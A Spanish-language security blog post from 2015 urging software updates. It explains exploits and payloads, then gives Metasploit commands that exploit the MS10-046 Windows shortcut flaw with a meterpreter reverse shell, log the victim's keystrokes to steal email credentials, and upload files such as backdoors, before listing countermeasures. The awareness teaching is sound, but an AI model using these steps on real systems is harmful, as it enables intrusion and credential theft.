top of page

14 de agosto de 2015

Actualiza tu software y evita

el hackeo de tu máquina

En este post podrás entender que las vulnerabilidades del software permiten hackeos y así cuidarte de este problema.

Ten en cuenta

Keylogers: Son programas que graban toda la información que es ingresada desde el teclado de tu computador.

Ilustración.

SALUDOS DIGITALES, Y CONOCIMIENTO LIBRE,

Luis Enríquez
(LLM, MD, CEH, CHFI)
https://www.owasp.org/index.php/OWASP_Security_Labeling_System_Project
http://fosslawyers.org
twitter: @foss_lawyers
Linkedin: http://www.linkedin.com/in/LuisEnriquezA

Seguramente todos han escuchado la recomendación de mantener sus sistemas y aplicaciones actualizadas. Pués tienen toda la razón! Y en este post explicaré por qué es tan peligroso no actualizar nuestros sistemas. Comencemos diciendo que el principal objetivo de las actualizaciones es corregir los las fallas de seguridad (o bugs) encontrados en el software.

Una vulnerabilidad es el software es  una debilidad que permite a un tercero atacar y explotar dicho sistema informático. Para explotar las vulnerabilidades, se programan los exploits, que son programas destinados a explotar las fallas de seguridad del software, obteniendo el control del sistema.

Las empresas grandes de Internet como Google o Mozilla, pagan a los hackers para que encuentren vulnerabilidades en sus códigos fuentes, y así evitar grandes perdidas económicas.  Las vulnerabilidades reportadas y exploits conocidas pueden conocerse en sitios como: https://nvd.nist.gov/   o https://www.exploit-db.com/.

Una vez que las exploits han obtenido acceso al sistema aprovechándose de las vulnerabiliades de un sistema,  necesitan de un Payload (o carga) para ser ejecutadas. El Payload es el programa malicioso que pemite la transmisión de datos entre la computadora hackeada, y la del atacante.

Metasploit
Es uno los kits de herramientas más eficaces para explotar vulnerabilidades. Hay una versión libre, y otra pagada. Casi todos sus componentes son software libre (y open source), licenciados bajo los términos de la licencia 3-clause BSD.   A continuación la forma cómo actúan los piratas informáticos:

1. Descargan metasploit desde http://www.metasploit.com/
 

2. Una vez instalado corremos la ejecutable. En este caso (o en cualquier distribución basada en Linux) desde el terminal con msfconsole.

3. Buscamos una vulnerabilidad para explotar. En este caso se utilizará una vulnerabilidad conocida llamada ms10_046_shotcut_icon_dllloader.  Es una falla común en Internet Explorer, utilizada para explotar sistemas operativo windows 7. Los comandos a utilizar son los siguientes:
- use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
- set SRVHOST  (tu dirección IP)
- set LHOST (de nuevo tu dirección IP)
- set PAYLOAD  windows/meterpreter/reverse_tcp
- exploit

* En caso de comunicaciones remotas, y para utilizar nombres de dominio (como www.pastebin.com) en lugar de direcciones IP, utilizan el Payload:  windows/meterpreter/reverse_tcp_dns .

Manos a la obra

5. Desde la máquina de la víctima, se visita la página del atacante. Para esto podrían usar un nombre de dominio (como www.pastebin.com) en lugar de un dirección IP.

4. Una vez ejecutada la exploit, el ordenador quedará en la espera de recibir la conexión remota.

6. Ahora  aparece un mensaje de advertencia por slir del modo seguro de Internet Explorer. Muchos no le harán caso como es habitual al navegar en Internet.

7. Entonces se habrá explotado el sistema de la víctima, ganando el control de su sistema.  A continuación exploraremos algunas acciones que el atacante puede hacer una vez que hackeo la máquina deseada.

8. Metasploit viene con funcionalidad de keylogger. Habilitmaos está función con el comando keyscan_start.

9. Todo lo que la víctima digite en su teclado, será enviado al atacante. Incluidas sus credenciales de email:

10. Se chequea el keylogger con el comando keyscan_dump:

Así es como los hackers tienen acceso a los emails de la víctima.

11. Ahora para terminar, el atacante también puede subir archivos a la máquina de la víctima. Esto es grave pues, podría subir  un backdoor para acceso permanente, e includo  evidencia falsa. Ej: Imaginense que les suban archivos con el único fin de generar evidencias falsas, para culparlos acerca de delitos que no han cometido.

CONTRAMEDIDAS
- Lo primero es tomar conciencia Este escenario apocalíptico no es ficción, es algo que sucede muy amenudo en nuestro mundo digitalizado.  

- Es imposible prevenir las vulnerabilidades al 100%. Sin embargo siempre ayuda contar con unsistema de alerta como Snort(IDS), escaneos regulares un buen antivirus, y un buen firewall.

- Actualizar sus sistemas lo más rapido posible. Esta es la mejor manera de parchar las vulnerabilidades de nuestro software.

- Escanear nuestros sistemas informáticos de manera regular con un Escaner de vulnerabilidades como Nessus, u OpenVas.

- Realizar Tests de penetración(Pen Testing) para descubrir y corregir las vulnerabilidades de nuestra infraestructura, antes que lo hagan atacantes maliciosos.


En una próxima edición seguiremos explorando las posibilidades de metasploit.
 

El autor

Luis Enríquez

Posts anteriores
Mejora las seguridad de tus claves

Aprende a tener el control sobre tus claves.

Encriptas tus chats

Una guía rápida para tener chats realmente privados.

Salta la censura en Internet con TOR

Navegar con anonimato en la red...

Ocultar archivos en lugares inesperados

Archivos secretos dentro de fotos, audios, etc...

Videochat de bienvenida
Las noticias del día

Join us on:

 

  • Facebook Classic
  • Twitter Classic
  • YouTube Classic

Libertad Digital, 2014'2015

bottom of page